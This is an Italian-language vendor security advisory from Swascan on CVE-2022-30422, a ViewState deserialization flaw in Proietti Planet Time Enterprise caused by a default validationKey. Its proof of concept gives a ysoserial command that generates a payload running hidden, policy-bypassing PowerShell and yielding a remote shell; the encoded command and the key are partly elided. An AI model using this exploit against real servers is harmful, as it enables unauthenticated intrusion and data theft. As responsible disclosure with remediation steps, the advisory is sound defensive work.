Security Advisory: Proietti Planet Time Enterprise (CVE-2022-30422)

L’Offensive Security Team di Swascan ha identificato una vulnerabilità della web app Proietti Planet Time Enterprise.

Proietti Tech Srl

Proietti Tech Srl è una società italiana di sviluppo software e produzione di apparecchiature elettroniche (lettori di badge utilizzati in presenza, controllo accessi e raccolta dati).

Descrizione Prodotto

Planet Time Enterprise è il software rilevazione presenze concepito e sviluppato da Proietti.

Un potente strumento che agevola la gestione delle risorse umane con l’automazione dei processi e lo snellimento delle procedure, rendendo disponibili le informazioni in tempo reale.

La possibilità di utilizzo sia in ambiente Windows che Web con la flessibilità di configurazione, rendono il prodotto innovativo ed ideale sia per strutture semplici che per realtà più complesse.

Il Planet Time Enterprise può essere considerato una suite completa, in grado di gestire tutti gli aspetti che coinvolgono la gestione della rilevazione presenze e risorse umane.

Technical summary

Il Cyber Security Team di Swascan ha trovato un importante vulnerabilità su: Planet Time Enterprise Web

AssetsVulnerabilityCVSSSeverity
Planet Time Enterprise
4.2.0.1, 4.2.0.0, 4.1.0.0, 4.0.0.0, 3.3.1.0, 3.3.0.0
ViewState deserialization8.1High

Nella seguente sezione vengono riportati i dettagli tecnici su questa vulnerabilità, comprese le evidenze e un proof-of-concept. Questa vulnerabilità può interessare centinaia di clienti che utilizzano il software.

Descrizione

L’applicazione risulta utilizzare una validationKey nel file web.config installata di default.

Un potenziale attaccante, avendo a disposizione la validationKey utilizzata di default dall’applicativo, sarà in grado di effettuare un attacco di VIEWSTATE deserialization ed eseguire comandi da remoto sul server, con conseguente accesso diretto alla macchina e a tutti i dati in essa contenuti.

Per sfruttare correttamente questa vulnerabilità, non è necessaria alcuna autenticazione.

Di seguito viene riportato un esempio di come è stato possibile eseguire comandi da remoto sfruttando la vulnerabilità.

Proof of Concept

Di seguito viene riportato il comando utilizzato per generare il payload che ha consentito di eseguire comandi da remoto attraverso una POST request come parametro VIEWSTATE:

.\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell -ep bypass -windowstyle hidden -encodedCommand JABjAG-wAaQBlAG4Ad..
snipped..UAbgB0AC4AQwBsAG8AcwBlACgAKQAKAA==" --validationalg="SHA1" --validationkey=".. snipped.." --generator=..snipped..

Dopo aver generato il comando è stata effettuata una POST request con il payload creato sopra.

Dopo aver inviato la POST request il risultato del payload è una shell interattiva sul server che ospita l’applicativo.

Impatto

L’attaccante può ottenere accesso al server remoto ed eseguire comandi sul sistema windows, come ad esempio esfiltrazione di dati personali o sensibili, movimenti laterali ed encryption dei dati tramite ransomware e richiesta di riscatto.

Remediation

  • Assicurarsi che il framework .NET sia aggiornato all’ultima versione supportata dal vendor.
  • Verificare che le seguenti impostazioni siano configurate per IIS:

  – enableViewStateMac sia impostata su ‘true’
  – aspnet:AllowInsecureDeserialization sia impostata su ‘false’

  • Rigenerare o sostituire le chiavi di convalida nel file web.config o impostare la generazione automatica delle stesse.
  • Aggiornare il software all’ultima versione disponibile.

Riferimenti

Disclosure Timeline

  • 29-03-2022: Vulnerabilità scoperta
  • 07-04-2022: Vendor contattato per e-mail (1a volta, nessuna risposta)
  • 21-04-2022: Vendor contattato per e-mail (2a volta, il vendor risponde)
  • 22-04-2022: Condiviso report con il vendor
  • 03-05-2022: CVE-ID richiesto al MITRE
  • 19-05-2022: Vendor richiede verifica della patch
  • 27-05-2022: ​​CVE-ID assegnato CVE-2022-30422
  • 31-05-2022: accordo per la data di pubblicazione del security advisory
  • 16-06-2022: pubblicazione del security advisory
Swascan Academy lancia la Seconda Edizione del corso propedeutico alla Certificazione CISSP!
Chrome Loader: Analisi Malware

Pronto intervento Cyber Swascan

Contattaci per un supporto immediato

Il sottoscritto, in qualità di interessato DICHIARA di aver letto e compreso il contenuto della privacy policy ai sensi dell’articolo 13, GDPR. ACCONSENTE al trattamento dei Dati in relazione all’invio da parte del Titolare di comunicazioni afferenti alla gestione di eventuali misure precontrattuali, preordinate alla stipulazione e/o esecuzione del contratto con il Cliente nonché all'adempimento dei relativi obblighi.
Il consenso prestato potrà essere revocato in qualsiasi momento contattando il Titolare ai recapiti presenti nella citata privacy policy.